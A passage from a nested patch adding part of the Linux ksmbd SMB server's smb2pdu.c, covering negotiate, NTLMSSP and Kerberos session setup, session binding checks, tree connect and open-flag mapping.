++			kfree(conn->preauth_info);
++			conn->preauth_info = NULL;
++			goto err_out;
++		}
++
++		ksmbd_gen_preauth_integrity_hash(conn,
++						 work->request_buf,
++						 conn->preauth_info->Preauth_HashValue);
++		rsp->NegotiateContextOffset =
++				cpu_to_le32(OFFSET_OF_NEG_CONTEXT);
++		assemble_neg_contexts(conn, rsp, work->response_buf);
++		break;
++	case SMB302_PROT_ID:
++		init_smb3_02_server(conn);
++		break;
++	case SMB30_PROT_ID:
++		init_smb3_0_server(conn);
++		break;
++	case SMB21_PROT_ID:
++		init_smb2_1_server(conn);
++		break;
++	case SMB2X_PROT_ID:
++	case BAD_PROT_ID:
++	default:
++		ksmbd_debug(SMB, "Server dialect :0x%x not supported\n",
++			    conn->dialect);
++		rsp->hdr.Status = STATUS_NOT_SUPPORTED;
++		rc = -EINVAL;
++		goto err_out;
++	}
++	rsp->Capabilities = cpu_to_le32(conn->vals->capabilities);
++
++	/* For stats */
++	conn->connection_type = conn->dialect;
++
++	rsp->MaxTransactSize = cpu_to_le32(conn->vals->max_trans_size);
++	rsp->MaxReadSize = cpu_to_le32(conn->vals->max_read_size);
++	rsp->MaxWriteSize = cpu_to_le32(conn->vals->max_write_size);
++
++	memcpy(conn->ClientGUID, req->ClientGUID,
++			SMB2_CLIENT_GUID_SIZE);
++	conn->cli_sec_mode = le16_to_cpu(req->SecurityMode);
++
++	rsp->StructureSize = cpu_to_le16(65);
++	rsp->DialectRevision = cpu_to_le16(conn->dialect);
++	/* Not setting conn guid rsp->ServerGUID, as it
++	 * not used by client for identifying server
++	 */
++	memset(rsp->ServerGUID, 0, SMB2_CLIENT_GUID_SIZE);
++
++	rsp->SystemTime = cpu_to_le64(ksmbd_systime());
++	rsp->ServerStartTime = 0;
++	ksmbd_debug(SMB, "negotiate context offset %d, count %d\n",
++		    le32_to_cpu(rsp->NegotiateContextOffset),
++		    le16_to_cpu(rsp->NegotiateContextCount));
++
++	rsp->SecurityBufferOffset = cpu_to_le16(128);
++	rsp->SecurityBufferLength = cpu_to_le16(AUTH_GSS_LENGTH);
++	ksmbd_copy_gss_neg_header((char *)(&rsp->hdr) +
++				  le16_to_cpu(rsp->SecurityBufferOffset));
++	inc_rfc1001_len(work->response_buf, sizeof(struct smb2_negotiate_rsp) -
++			sizeof(struct smb2_hdr) - sizeof(rsp->Buffer) +
++			 AUTH_GSS_LENGTH);
++	rsp->SecurityMode = SMB2_NEGOTIATE_SIGNING_ENABLED_LE;
++	conn->use_spnego = true;
++
++	if ((server_conf.signing == KSMBD_CONFIG_OPT_AUTO ||
++	     server_conf.signing == KSMBD_CONFIG_OPT_DISABLED) &&
++	    req->SecurityMode & SMB2_NEGOTIATE_SIGNING_REQUIRED_LE)
++		conn->sign = true;
++	else if (server_conf.signing == KSMBD_CONFIG_OPT_MANDATORY) {
++		server_conf.enforced_signing = true;
++		rsp->SecurityMode |= SMB2_NEGOTIATE_SIGNING_REQUIRED_LE;
++		conn->sign = true;
++	}
++
++	conn->srv_sec_mode = le16_to_cpu(rsp->SecurityMode);
++	ksmbd_conn_set_need_negotiate(conn);
++
++err_out:
++	if (rc < 0)
++		smb2_set_err_rsp(work);
++
++	return rc;
++}
++
++static int alloc_preauth_hash(struct ksmbd_session *sess,
++			      struct ksmbd_conn *conn)
++{
++	if (sess->Preauth_HashValue)
++		return 0;
++
++	sess->Preauth_HashValue = kmemdup(conn->preauth_info->Preauth_HashValue,
++					  PREAUTH_HASHVALUE_SIZE, GFP_KERNEL);
++	if (!sess->Preauth_HashValue)
++		return -ENOMEM;
++
++	return 0;
++}
++
++static int generate_preauth_hash(struct ksmbd_work *work)
++{
++	struct ksmbd_conn *conn = work->conn;
++	struct ksmbd_session *sess = work->sess;
++	u8 *preauth_hash;
++
++	if (conn->dialect != SMB311_PROT_ID)
++		return 0;
++
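++	/* A binding session keeps its preauth hash in a per-connection
++	 * preauth_session; a normal session keeps it on the session itself.
++	 */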
++	if (conn->binding) {
++		struct preauth_session *preauth_sess;
++
++		preauth_sess = ksmbd_preauth_session_lookup(conn, sess->id);
++		if (!preauth_sess) {
++			preauth_sess = ksmbd_preauth_session_alloc(conn, sess->id);
++			if (!preauth_sess)
++				return -ENOMEM;
++		}
++
++		preauth_hash = preauth_sess->Preauth_HashValue;
++	} else {
++		if (!sess->Preauth_HashValue)
++			if (alloc_preauth_hash(sess, conn))
++				return -ENOMEM;
++		preauth_hash = sess->Preauth_HashValue;
++	}
++
++	ksmbd_gen_preauth_integrity_hash(conn, work->request_buf, preauth_hash);
++	return 0;
++}
++
++static int decode_negotiation_token(struct ksmbd_conn *conn,
++				    struct negotiate_message *negblob,
++				    size_t sz)
++{
++	if (!conn->use_spnego)
++		return -EINVAL;
++
++	if (ksmbd_decode_negTokenInit((char *)negblob, sz, conn)) {
++		if (ksmbd_decode_negTokenTarg((char *)negblob, sz, conn)) {
++			conn->auth_mechs |= KSMBD_AUTH_NTLMSSP;
++			conn->preferred_auth_mech = KSMBD_AUTH_NTLMSSP;
++			conn->use_spnego = false;
++		}
++	}
++	return 0;
++}
++
++static int ntlm_negotiate(struct ksmbd_work *work,
++			  struct negotiate_message *negblob,
++			  size_t negblob_len)
++{
++	struct smb2_sess_setup_rsp *rsp = smb2_get_msg(work->response_buf);
++	struct challenge_message *chgblob;
++	unsigned char *spnego_blob = NULL;
++	u16 spnego_blob_len;
++	char *neg_blob;
++	int sz, rc;
++
++	ksmbd_debug(SMB, "negotiate phase\n");
++	rc = ksmbd_decode_ntlmssp_neg_blob(negblob, negblob_len, work->conn);
++	if (rc)
++		return rc;
++
++	sz = le16_to_cpu(rsp->SecurityBufferOffset);
++	chgblob =
++		(struct challenge_message *)((char *)&rsp->hdr.ProtocolId + sz);
++	memset(chgblob, 0, sizeof(struct challenge_message));
++
++	if (!work->conn->use_spnego) {
++		sz = ksmbd_build_ntlmssp_challenge_blob(chgblob, work->conn);
++		if (sz < 0)
++			return -ENOMEM;
++
++		rsp->SecurityBufferLength = cpu_to_le16(sz);
++		return 0;
++	}
++
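++	/* SPNEGO path: build the raw NTLMSSP challenge in a scratch buffer,
++	 * then wrap it in a SPNEGO blob before copying it into the response.
++	 */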
++	sz = sizeof(struct challenge_message);
++	sz += (strlen(ksmbd_netbios_name()) * 2 + 1 + 4) * 6;
++
++	neg_blob = kzalloc(sz, GFP_KERNEL);
++	if (!neg_blob)
++		return -ENOMEM;
++
++	chgblob = (struct challenge_message *)neg_blob;
++	sz = ksmbd_build_ntlmssp_challenge_blob(chgblob, work->conn);
++	if (sz < 0) {
++		rc = -ENOMEM;
++		goto out;
++	}
++
++	rc = build_spnego_ntlmssp_neg_blob(&spnego_blob, &spnego_blob_len,
++					   neg_blob, sz);
++	if (rc) {
++		rc = -ENOMEM;
++		goto out;
++	}
++
++	sz = le16_to_cpu(rsp->SecurityBufferOffset);
++	memcpy((char *)&rsp->hdr.ProtocolId + sz, spnego_blob, spnego_blob_len);
++	rsp->SecurityBufferLength = cpu_to_le16(spnego_blob_len);
++
++out:
++	kfree(spnego_blob);
++	kfree(neg_blob);
++	return rc;
++}
++
++static struct authenticate_message *user_authblob(struct ksmbd_conn *conn,
++						  struct smb2_sess_setup_req *req)
++{
++	int sz;
++
++	if (conn->use_spnego && conn->mechToken)
++		return (struct authenticate_message *)conn->mechToken;
++
++	sz = le16_to_cpu(req->SecurityBufferOffset);
++	return (struct authenticate_message *)((char *)&req->hdr.ProtocolId
++					       + sz);
++}
++
++static struct ksmbd_user *session_user(struct ksmbd_conn *conn,
++				       struct smb2_sess_setup_req *req)
++{
++	struct authenticate_message *authblob;
++	struct ksmbd_user *user;
++	char *name;
++	unsigned int name_off, name_len, secbuf_len;
++
++	secbuf_len = le16_to_cpu(req->SecurityBufferLength);
++	if (secbuf_len < sizeof(struct authenticate_message)) {
++		ksmbd_debug(SMB, "blob len %d too small\n", secbuf_len);
++		return NULL;
++	}
++	authblob = user_authblob(conn, req);
++	name_off = le32_to_cpu(authblob->UserName.BufferOffset);
++	name_len = le16_to_cpu(authblob->UserName.Length);
++
++	if (secbuf_len < (u64)name_off + name_len)
++		return NULL;
++
++	name = smb_strndup_from_utf16((const char *)authblob + name_off,
++				      name_len,
++				      true,
++				      conn->local_nls);
++	if (IS_ERR(name)) {
++		pr_err("cannot allocate memory\n");
++		return NULL;
++	}
++
++	ksmbd_debug(SMB, "session setup request for user %s\n", name);
++	user = ksmbd_login_user(name);
++	kfree(name);
++	return user;
++}
++
++static int ntlm_authenticate(struct ksmbd_work *work)
++{
++	struct smb2_sess_setup_req *req = smb2_get_msg(work->request_buf);
++	struct smb2_sess_setup_rsp *rsp = smb2_get_msg(work->response_buf);
++	struct ksmbd_conn *conn = work->conn;
++	struct ksmbd_session *sess = work->sess;
++	struct channel *chann = NULL;
++	struct ksmbd_user *user;
++	u64 prev_id;
++	int sz, rc;
++
++	ksmbd_debug(SMB, "authenticate phase\n");
++	if (conn->use_spnego) {
++		unsigned char *spnego_blob;
++		u16 spnego_blob_len;
++
++		rc = build_spnego_ntlmssp_auth_blob(&spnego_blob,
++						    &spnego_blob_len,
++						    0);
++		if (rc)
++			return -ENOMEM;
++
++		sz = le16_to_cpu(rsp->SecurityBufferOffset);
++		memcpy((char *)&rsp->hdr.ProtocolId + sz, spnego_blob, spnego_blob_len);
++		rsp->SecurityBufferLength = cpu_to_le16(spnego_blob_len);
++		kfree(spnego_blob);
++		inc_rfc1001_len(work->response_buf, spnego_blob_len - 1);
++	}
++
++	user = session_user(conn, req);
++	if (!user) {
++		ksmbd_debug(SMB, "Unknown user name or an error\n");
++		return -EPERM;
++	}
++
++	/* Check for previous session */
++	prev_id = le64_to_cpu(req->PreviousSessionId);
++	if (prev_id && prev_id != sess->id)
++		destroy_previous_session(conn, user, prev_id);
++
++	if (sess->state == SMB2_SESSION_VALID) {
++		/*
++		 * Reuse the session if an anonymous user tries to
++		 * connect on reauthentication.
++		 */
++		if (conn->binding == false && ksmbd_anonymous_user(user)) {
++			ksmbd_free_user(user);
++			return 0;
++		}
++
++		if (!ksmbd_compare_user(sess->user, user)) {
++			ksmbd_free_user(user);
++			return -EPERM;
++		}
++		ksmbd_free_user(user);
++	} else {
++		sess->user = user;
++	}
++
++	if (conn->binding == false && user_guest(sess->user)) {
++		rsp->SessionFlags = SMB2_SESSION_FLAG_IS_GUEST_LE;
++	} else {
++		struct authenticate_message *authblob;
++
++		authblob = user_authblob(conn, req);
++		sz = le16_to_cpu(req->SecurityBufferLength);
++		rc = ksmbd_decode_ntlmssp_auth_blob(authblob, sz, conn, sess);
++		if (rc) {
++			set_user_flag(sess->user, KSMBD_USER_FLAG_BAD_PASSWORD);
++			ksmbd_debug(SMB, "authentication failed\n");
++			return -EPERM;
++		}
++	}
++
++	/*
++	 * If the session state is SMB2_SESSION_VALID, we can assume
++	 * this is a reauthentication. The user/password has already
++	 * been verified, so return here.
++	 */
++	if (sess->state == SMB2_SESSION_VALID) {
++		if (conn->binding)
++			goto binding_session;
++		return 0;
++	}
++
++	if ((rsp->SessionFlags != SMB2_SESSION_FLAG_IS_GUEST_LE &&
++	     (conn->sign || server_conf.enforced_signing)) ||
++	    (req->SecurityMode & SMB2_NEGOTIATE_SIGNING_REQUIRED))
++		sess->sign = true;
++
++	if (smb3_encryption_negotiated(conn) &&
++			!(req->Flags & SMB2_SESSION_REQ_FLAG_BINDING)) {
++		rc = conn->ops->generate_encryptionkey(conn, sess);
++		if (rc) {
++			ksmbd_debug(SMB,
++					"SMB3 encryption key generation failed\n");
++			return -EINVAL;
++		}
++		sess->enc = true;
++		rsp->SessionFlags = SMB2_SESSION_FLAG_ENCRYPT_DATA_LE;
++		/*
++		 * signing is disabled if encryption is enabled
++		 * on this session
++		 */
++		sess->sign = false;
++	}
++
++binding_session:
++	if (conn->dialect >= SMB30_PROT_ID) {
++		chann = lookup_chann_list(sess, conn);
++		if (!chann) {
++			chann = kmalloc(sizeof(struct channel), GFP_KERNEL);
++			if (!chann)
++				return -ENOMEM;
++
++			chann->conn = conn;
++			xa_store(&sess->ksmbd_chann_list, (long)conn, chann, GFP_KERNEL);
++		}
++	}
++
++	if (conn->ops->generate_signingkey) {
++		rc = conn->ops->generate_signingkey(sess, conn);
++		if (rc) {
++			ksmbd_debug(SMB, "SMB3 signing key generation failed\n");
++			return -EINVAL;
++		}
++	}
++
++	if (!ksmbd_conn_lookup_dialect(conn)) {
++		pr_err("fail to verify the dialect\n");
++		return -ENOENT;
++	}
++	return 0;
++}
++
++#ifdef CONFIG_SMB_SERVER_KERBEROS5
++static int krb5_authenticate(struct ksmbd_work *work)
++{
++	struct smb2_sess_setup_req *req = smb2_get_msg(work->request_buf);
++	struct smb2_sess_setup_rsp *rsp = smb2_get_msg(work->response_buf);
++	struct ksmbd_conn *conn = work->conn;
++	struct ksmbd_session *sess = work->sess;
++	char *in_blob, *out_blob;
++	struct channel *chann = NULL;
++	u64 prev_sess_id;
++	int in_len, out_len;
++	int retval;
++
++	in_blob = (char *)&req->hdr.ProtocolId +
++		le16_to_cpu(req->SecurityBufferOffset);
++	in_len = le16_to_cpu(req->SecurityBufferLength);
++	out_blob = (char *)&rsp->hdr.ProtocolId +
++		le16_to_cpu(rsp->SecurityBufferOffset);
++	out_len = work->response_sz -
++		(le16_to_cpu(rsp->SecurityBufferOffset) + 4);
++
++	/* Check previous session */
++	prev_sess_id = le64_to_cpu(req->PreviousSessionId);
++	if (prev_sess_id && prev_sess_id != sess->id)
++		destroy_previous_session(conn, sess->user, prev_sess_id);
++
++	if (sess->state == SMB2_SESSION_VALID)
++		ksmbd_free_user(sess->user);
++
++	retval = ksmbd_krb5_authenticate(sess, in_blob, in_len,
++					 out_blob, &out_len);
++	if (retval) {
++		ksmbd_debug(SMB, "krb5 authentication failed\n");
++		return -EINVAL;
++	}
++	rsp->SecurityBufferLength = cpu_to_le16(out_len);
++	inc_rfc1001_len(work->response_buf, out_len - 1);
++
++	if ((conn->sign || server_conf.enforced_signing) ||
++	    (req->SecurityMode & SMB2_NEGOTIATE_SIGNING_REQUIRED))
++		sess->sign = true;
++
++	if (smb3_encryption_negotiated(conn)) {
++		retval = conn->ops->generate_encryptionkey(conn, sess);
++		if (retval) {
++			ksmbd_debug(SMB,
++				    "SMB3 encryption key generation failed\n");
++			return -EINVAL;
++		}
++		sess->enc = true;
++		rsp->SessionFlags = SMB2_SESSION_FLAG_ENCRYPT_DATA_LE;
++		sess->sign = false;
++	}
++
++	if (conn->dialect >= SMB30_PROT_ID) {
++		chann = lookup_chann_list(sess, conn);
++		if (!chann) {
++			chann = kmalloc(sizeof(struct channel), GFP_KERNEL);
++			if (!chann)
++				return -ENOMEM;
++
++			chann->conn = conn;
++			xa_store(&sess->ksmbd_chann_list, (long)conn, chann, GFP_KERNEL);
++		}
++	}
++
++	if (conn->ops->generate_signingkey) {
++		retval = conn->ops->generate_signingkey(sess, conn);
++		if (retval) {
++			ksmbd_debug(SMB, "SMB3 signing key generation failed\n");
++			return -EINVAL;
++		}
++	}
++
++	if (!ksmbd_conn_lookup_dialect(conn)) {
++		pr_err("fail to verify the dialect\n");
++		return -ENOENT;
++	}
++	return 0;
++}
++#else
++static int krb5_authenticate(struct ksmbd_work *work)
++{
++	return -EOPNOTSUPP;
++}
++#endif
++
++int smb2_sess_setup(struct ksmbd_work *work)
++{
++	struct ksmbd_conn *conn = work->conn;
++	struct smb2_sess_setup_req *req = smb2_get_msg(work->request_buf);
++	struct smb2_sess_setup_rsp *rsp = smb2_get_msg(work->response_buf);
++	struct ksmbd_session *sess;
++	struct negotiate_message *negblob;
++	unsigned int negblob_len, negblob_off;
++	int rc = 0;
++
++	ksmbd_debug(SMB, "Received request for session setup\n");
++
++	rsp->StructureSize = cpu_to_le16(9);
++	rsp->SessionFlags = 0;
++	rsp->SecurityBufferOffset = cpu_to_le16(72);
++	rsp->SecurityBufferLength = 0;
++	inc_rfc1001_len(work->response_buf, 9);
++
++	ksmbd_conn_lock(conn);
++	if (!req->hdr.SessionId) {
++		sess = ksmbd_smb2_session_create();
++		if (!sess) {
++			rc = -ENOMEM;
++			goto out_err;
++		}
++		rsp->hdr.SessionId = cpu_to_le64(sess->id);
++		rc = ksmbd_session_register(conn, sess);
++		if (rc)
++			goto out_err;
++	} else if (conn->dialect >= SMB30_PROT_ID &&
++		   (server_conf.flags & KSMBD_GLOBAL_FLAG_SMB3_MULTICHANNEL) &&
++		   req->Flags & SMB2_SESSION_REQ_FLAG_BINDING) {
++		u64 sess_id = le64_to_cpu(req->hdr.SessionId);
++
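++		/* Session binding: the client is attaching a new channel to
++		 * an existing session, so the dialect, signing flag and
++		 * ClientGUID must all match the original connection.
++		 */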
++		sess = ksmbd_session_lookup_slowpath(sess_id);
++		if (!sess) {
++			rc = -ENOENT;
++			goto out_err;
++		}
++
++		if (conn->dialect != sess->dialect) {
++			rc = -EINVAL;
++			goto out_err;
++		}
++
++		if (!(req->hdr.Flags & SMB2_FLAGS_SIGNED)) {
++			rc = -EINVAL;
++			goto out_err;
++		}
++
++		if (strncmp(conn->ClientGUID, sess->ClientGUID,
++			    SMB2_CLIENT_GUID_SIZE)) {
++			rc = -ENOENT;
++			goto out_err;
++		}
++
++		if (sess->state == SMB2_SESSION_IN_PROGRESS) {
++			rc = -EACCES;
++			goto out_err;
++		}
++
++		if (sess->state == SMB2_SESSION_EXPIRED) {
++			rc = -EFAULT;
++			goto out_err;
++		}
++
++		if (ksmbd_conn_need_reconnect(conn)) {
++			rc = -EFAULT;
++			sess = NULL;
++			goto out_err;
++		}
++
++		if (ksmbd_session_lookup(conn, sess_id)) {
++			rc = -EACCES;
++			goto out_err;
++		}
++
++		if (user_guest(sess->user)) {
++			rc = -EOPNOTSUPP;
++			goto out_err;
++		}
++
++		conn->binding = true;
++	} else if ((conn->dialect < SMB30_PROT_ID ||
++		    server_conf.flags & KSMBD_GLOBAL_FLAG_SMB3_MULTICHANNEL) &&
++		   (req->Flags & SMB2_SESSION_REQ_FLAG_BINDING)) {
++		sess = NULL;
++		rc = -EACCES;
++		goto out_err;
++	} else {
++		sess = ksmbd_session_lookup(conn,
++					    le64_to_cpu(req->hdr.SessionId));
++		if (!sess) {
++			rc = -ENOENT;
++			goto out_err;
++		}
++
++		if (sess->state == SMB2_SESSION_EXPIRED) {
++			rc = -EFAULT;
++			goto out_err;
++		}
++
++		if (ksmbd_conn_need_reconnect(conn)) {
++			rc = -EFAULT;
++			sess = NULL;
++			goto out_err;
++		}
++	}
++	work->sess = sess;
++
++	negblob_off = le16_to_cpu(req->SecurityBufferOffset);
++	negblob_len = le16_to_cpu(req->SecurityBufferLength);
++	if (negblob_off < offsetof(struct smb2_sess_setup_req, Buffer) ||
++	    negblob_len < offsetof(struct negotiate_message, NegotiateFlags)) {
++		rc = -EINVAL;
++		goto out_err;
++	}
++
++	negblob = (struct negotiate_message *)((char *)&req->hdr.ProtocolId +
++			negblob_off);
++
++	if (decode_negotiation_token(conn, negblob, negblob_len) == 0) {
++		if (conn->mechToken)
++			negblob = (struct negotiate_message *)conn->mechToken;
++	}
++
++	if (server_conf.auth_mechs & conn->auth_mechs) {
++		rc = generate_preauth_hash(work);
++		if (rc)
++			goto out_err;
++
++		if (conn->preferred_auth_mech &
++				(KSMBD_AUTH_KRB5 | KSMBD_AUTH_MSKRB5)) {
++			rc = krb5_authenticate(work);
++			if (rc) {
++				rc = -EINVAL;
++				goto out_err;
++			}
++
++			if (!ksmbd_conn_need_reconnect(conn)) {
++				ksmbd_conn_set_good(conn);
++				sess->state = SMB2_SESSION_VALID;
++			}
++			kfree(sess->Preauth_HashValue);
++			sess->Preauth_HashValue = NULL;
++		} else if (conn->preferred_auth_mech == KSMBD_AUTH_NTLMSSP) {
++			if (negblob->MessageType == NtLmNegotiate) {
++				rc = ntlm_negotiate(work, negblob, negblob_len);
++				if (rc)
++					goto out_err;
++				rsp->hdr.Status =
++					STATUS_MORE_PROCESSING_REQUIRED;
++				/*
++				 * Note: the total size is decremented by 1
++				 * here as an adjustment for the zero-size
++				 * blob.
++				 */
++				inc_rfc1001_len(work->response_buf,
++						le16_to_cpu(rsp->SecurityBufferLength) - 1);
++
++			} else if (negblob->MessageType == NtLmAuthenticate) {
++				rc = ntlm_authenticate(work);
++				if (rc)
++					goto out_err;
++
++				if (!ksmbd_conn_need_reconnect(conn)) {
++					ksmbd_conn_set_good(conn);
++					sess->state = SMB2_SESSION_VALID;
++				}
++				if (conn->binding) {
++					struct preauth_session *preauth_sess;
++
++					preauth_sess =
++						ksmbd_preauth_session_lookup(conn, sess->id);
++					if (preauth_sess) {
++						list_del(&preauth_sess->preauth_entry);
++						kfree(preauth_sess);
++					}
++				}
++				kfree(sess->Preauth_HashValue);
++				sess->Preauth_HashValue = NULL;
++			} else {
++				pr_info_ratelimited("Unknown NTLMSSP message type : 0x%x\n",
++						le32_to_cpu(negblob->MessageType));
++				rc = -EINVAL;
++			}
++		} else {
++			/* TODO: need one more negotiation */
++			pr_err("Not support the preferred authentication\n");
++			rc = -EINVAL;
++		}
++	} else {
++		pr_err("Not support authentication\n");
++		rc = -EINVAL;
++	}
++
++out_err:
++	if (rc == -EINVAL)
++		rsp->hdr.Status = STATUS_INVALID_PARAMETER;
++	else if (rc == -ENOENT)
++		rsp->hdr.Status = STATUS_USER_SESSION_DELETED;
++	else if (rc == -EACCES)
++		rsp->hdr.Status = STATUS_REQUEST_NOT_ACCEPTED;
++	else if (rc == -EFAULT)
++		rsp->hdr.Status = STATUS_NETWORK_SESSION_EXPIRED;
++	else if (rc == -ENOMEM)
++		rsp->hdr.Status = STATUS_INSUFFICIENT_RESOURCES;
++	else if (rc == -EOPNOTSUPP)
++		rsp->hdr.Status = STATUS_NOT_SUPPORTED;
++	else if (rc)
++		rsp->hdr.Status = STATUS_LOGON_FAILURE;
++
++	if (conn->use_spnego && conn->mechToken) {
++		kfree(conn->mechToken);
++		conn->mechToken = NULL;
++	}
++
++	if (rc < 0) {
++		/*
++		 * SecurityBufferOffset should be set to zero
++		 * in a session setup error response.
++		 */
++		rsp->SecurityBufferOffset = 0;
++
++		if (sess) {
++			bool try_delay = false;
++
++			/*
++			 * To mitigate dictionary attacks (rapidly repeated session setup
++			 * attempts), ksmbd delays for 5 seconds on session setup failure,
++			 * making it harder to send enough random connection requests to
++			 * break into the server.
++			 */
++			if (sess->user && sess->user->flags & KSMBD_USER_FLAG_DELAY_SESSION)
++				try_delay = true;
++
++			sess->last_active = jiffies;
++			sess->state = SMB2_SESSION_EXPIRED;
++			if (try_delay) {
++				ksmbd_conn_set_need_reconnect(conn);
++				ssleep(5);
++				ksmbd_conn_set_need_negotiate(conn);
++			}
++		}
++	}
++
++	ksmbd_conn_unlock(conn);
++	return rc;
++}
++
++/**
++ * smb2_tree_connect() - handler for smb2 tree connect command
++ * @work:	smb work containing smb request buffer
++ *
++ * Return:      0 on success, otherwise error
++ */
++int smb2_tree_connect(struct ksmbd_work *work)
++{
++	struct ksmbd_conn *conn = work->conn;
++	struct smb2_tree_connect_req *req = smb2_get_msg(work->request_buf);
++	struct smb2_tree_connect_rsp *rsp = smb2_get_msg(work->response_buf);
++	struct ksmbd_session *sess = work->sess;
++	char *treename = NULL, *name = NULL;
++	struct ksmbd_tree_conn_status status;
++	struct ksmbd_share_config *share;
++	int rc = -EINVAL;
++
++	treename = smb_strndup_from_utf16(req->Buffer,
++					  le16_to_cpu(req->PathLength), true,
++					  conn->local_nls);
++	if (IS_ERR(treename)) {
++		pr_err("treename is invalid\n");
++		status.ret = KSMBD_TREE_CONN_STATUS_ERROR;
++		goto out_err1;
++	}
++
++	name = ksmbd_extract_sharename(conn->um, treename);
++	if (IS_ERR(name)) {
++		status.ret = KSMBD_TREE_CONN_STATUS_ERROR;
++		goto out_err1;
++	}
++
++	ksmbd_debug(SMB, "tree connect request for tree %s treename %s\n",
++		    name, treename);
++
++	status = ksmbd_tree_conn_connect(conn, sess, name);
++	if (status.ret == KSMBD_TREE_CONN_STATUS_OK)
++		rsp->hdr.Id.SyncId.TreeId = cpu_to_le32(status.tree_conn->id);
++	else
++		goto out_err1;
++
++	share = status.tree_conn->share_conf;
++	if (test_share_config_flag(share, KSMBD_SHARE_FLAG_PIPE)) {
++		ksmbd_debug(SMB, "IPC share path request\n");
++		rsp->ShareType = SMB2_SHARE_TYPE_PIPE;
++		rsp->MaximalAccess = FILE_READ_DATA_LE | FILE_READ_EA_LE |
++			FILE_EXECUTE_LE | FILE_READ_ATTRIBUTES_LE |
++			FILE_DELETE_LE | FILE_READ_CONTROL_LE |
++			FILE_WRITE_DAC_LE | FILE_WRITE_OWNER_LE |
++			FILE_SYNCHRONIZE_LE;
++	} else {
++		rsp->ShareType = SMB2_SHARE_TYPE_DISK;
++		rsp->MaximalAccess = FILE_READ_DATA_LE | FILE_READ_EA_LE |
++			FILE_EXECUTE_LE | FILE_READ_ATTRIBUTES_LE;
++		if (test_tree_conn_flag(status.tree_conn,
++					KSMBD_TREE_CONN_FLAG_WRITABLE)) {
++			rsp->MaximalAccess |= FILE_WRITE_DATA_LE |
++				FILE_APPEND_DATA_LE | FILE_WRITE_EA_LE |
++				FILE_DELETE_LE | FILE_WRITE_ATTRIBUTES_LE |
++				FILE_DELETE_CHILD_LE | FILE_READ_CONTROL_LE |
++				FILE_WRITE_DAC_LE | FILE_WRITE_OWNER_LE |
++				FILE_SYNCHRONIZE_LE;
++		}
++	}
++
++	status.tree_conn->maximal_access = le32_to_cpu(rsp->MaximalAccess);
++	if (conn->posix_ext_supported)
++		status.tree_conn->posix_extensions = true;
++
++	rsp->StructureSize = cpu_to_le16(16);
++	inc_rfc1001_len(work->response_buf, 16);
++out_err1:
++	rsp->Capabilities = 0;
++	rsp->Reserved = 0;
++	/* default manual caching */
++	rsp->ShareFlags = SMB2_SHAREFLAG_MANUAL_CACHING;
++
++	if (!IS_ERR(treename))
++		kfree(treename);
++	if (!IS_ERR(name))
++		kfree(name);
++
++	switch (status.ret) {
++	case KSMBD_TREE_CONN_STATUS_OK:
++		rsp->hdr.Status = STATUS_SUCCESS;
++		rc = 0;
++		break;
++	case -ESTALE:
++	case -ENOENT:
++	case KSMBD_TREE_CONN_STATUS_NO_SHARE:
++		rsp->hdr.Status = STATUS_BAD_NETWORK_NAME;
++		break;
++	case -ENOMEM:
++	case KSMBD_TREE_CONN_STATUS_NOMEM:
++		rsp->hdr.Status = STATUS_NO_MEMORY;
++		break;
++	case KSMBD_TREE_CONN_STATUS_ERROR:
++	case KSMBD_TREE_CONN_STATUS_TOO_MANY_CONNS:
++	case KSMBD_TREE_CONN_STATUS_TOO_MANY_SESSIONS:
++		rsp->hdr.Status = STATUS_ACCESS_DENIED;
++		break;
++	case -EINVAL:
++		rsp->hdr.Status = STATUS_INVALID_PARAMETER;
++		break;
++	default:
++		rsp->hdr.Status = STATUS_ACCESS_DENIED;
++	}
++
++	if (status.ret != KSMBD_TREE_CONN_STATUS_OK)
++		smb2_set_err_rsp(work);
++
++	return rc;
++}
++
++/**
++ * smb2_create_open_flags() - convert smb open flags to unix open flags
++ * @file_present:	is file already present
++ * @access:		file access flags
++ * @disposition:	file disposition flags
++ * @may_flags:		set with MAY_ flags
++ *
++ * Return:      file open flags
++ */
++static int smb2_create_open_flags(bool file_present, __le32 access,
++				  __le32 disposition,
++				  int *may_flags)
++{
++	int oflags = O_NONBLOCK | O_LARGEFILE;
++
++	if (access & FILE_READ_DESIRED_ACCESS_LE &&
++	    access & FILE_WRITE_DESIRE_ACCESS_LE) {
++		oflags |= O_RDWR;
++		*may_flags = MAY_OPEN | MAY_READ | MAY_WRITE;
++	} else if (access & FILE_WRITE_DESIRE_ACCESS_LE) {
++		oflags |= O_WRONLY;
++		*may_flags = MAY_OPEN | MAY_WRITE;
++	} else {
++		oflags |= O_RDONLY;
++		*may_flags = MAY_OPEN | MAY_READ;
++	}
++
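++	/*
++	 * An attributes-only open (exactly FILE_READ_ATTRIBUTES) needs no
++	 * access to the file contents, so it maps to O_PATH.
++	 */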
++	if (access == FILE_READ_ATTRIBUTES_LE)
++		oflags |= O_PATH;
++
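++	/*
++	 * Map the create disposition: for an existing file, supersede and
++	 * overwrite dispositions truncate it; for a missing file, the
++	 * create-if dispositions add O_CREAT.
++	 */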
++	if (file_present) {
++		switch (disposition & FILE_CREATE_MASK_LE) {
++		case FILE_OPEN_LE:
++		case FILE_CREATE_LE:
++			break;
++		case FILE_SUPERSEDE_LE:
++		case FILE_OVERWRITE_LE:
++		case FILE_OVERWRITE_IF_LE:
++			oflags |= O_TRUNC;
++			break;
++		default:
++			break;
++		}
++	} else {
++		switch (disposition & FILE_CREATE_MASK_LE) {
++		case FILE_SUPERSEDE_LE:
++		case FILE_CREATE_LE:
++		case FILE_OPEN_IF_LE:
++		case FILE_OVERWRITE_IF_LE:
++			oflags |= O_CREAT;
++			break;
++		case FILE_OPEN_LE:
++		case FILE_OVERWRITE_LE:
++			oflags &= ~O_CREAT;
++			break;
++		default:
++			break;
++		}
++	}
++
++	return oflags;
++}
++
++/**
++ * smb2_tree_disconnect() - handler for smb tree disconnect request
++ * @work:	smb work containing request buffer
++ *
++ * Return:      0
++ */
++int smb2_tree_disconnect(struct ksmbd_work *work)
++{
++	struct smb2_tree_disconnect_rsp *rsp = smb2_get_msg(work->response_buf);
++	struct ksmbd_session *sess = work->sess;
++	struct ksmbd_tree_connect *tcon = work->tcon;
++
++	rsp->StructureSize = cpu_to_le16(4);
++	inc_rfc1001_len(work->response_buf, 4);
++
++	ksmbd_debug(SMB, "request\n");
++
++	if (!tcon || test_and_set_bit(TREE_CONN_EXPIRE, &tcon->status)) {
++		struct smb2_tree_disconnect_req *req =
++			smb2_get_msg(work->request_buf);
++
